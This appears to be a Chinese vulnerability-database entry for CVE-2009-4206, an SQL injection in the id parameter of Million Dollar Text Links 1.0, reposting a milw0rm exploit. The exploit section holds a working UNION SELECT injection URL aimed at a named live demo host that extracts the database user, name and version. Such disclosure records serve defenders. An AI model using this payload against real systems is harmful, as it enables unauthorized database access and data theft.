Cmsnx Million Dollar Text Links 'admin.link.modify.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117859 漏洞类型 SQL注入
发布时间 2009-05-29 更新时间 2009-05-29
CVE编号 CVE-2009-4206 CNNVD-ID CNNVD-200912-071
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8830
https://www.securityfocus.com/bid/44491
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200912-071
|漏洞详情
MillionDollarTextLinks1.0和早期版本中的admin.link.modify.php存在SQL注入漏洞,远程攻击者可以借助id参数执行任意SQL指令。
|漏洞EXP
||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait PEACE

=Vuln:		Million Dollar Text Links <= 1.0 SQL injection
=INFO:		http://www.cmsnx.com/product.demo.php?id=12
=BUY:  		http://www.cmsnx.com/product.purchase.php?id=12
=DORK:		----


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

LIVE DEMO:
http://www.kalptarudemos.com/demo/million/admin.link.modify.php?id=-6%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9--

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-=-=-==-Cookies<3==-=-==-=luv-=-them-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No-More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.

# milw0rm.com [2009-05-29]
|受影响的产品
Kalptaru Infotech Million Dollar Text Links 1.0
|参考资料

来源:XF
名称:milliondollar-id-sql-injection(50864)
链接:http://xforce.iss.net/xforce/xfdb/50864
来源:MILW0RM
名称:8830
链接:http://www.milw0rm.com/exploits/8830
来源:SECUNIA
名称:34994
链接:http://secunia.com/advisories/34994